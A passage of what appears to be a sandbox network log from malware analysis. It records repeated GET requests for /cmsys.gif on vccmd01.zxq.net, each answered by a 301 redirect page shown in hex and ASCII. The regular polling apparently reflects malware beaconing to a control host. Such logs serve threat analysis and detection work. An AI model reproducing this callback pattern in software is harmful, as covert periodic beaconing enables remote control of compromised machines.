                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:54 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.510487080 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.690017939 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:59 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.688527107 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.868623018 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:04 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.735500097 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.915785074 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:11 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:17.036303043 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:17.215444088 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:17 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.690196037 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.869741917 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:22 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.423357964 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.602705956 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:28 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.751893044 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.931695938 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:33 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:39.296521902 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:39.532135963 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:39 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.925714970 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
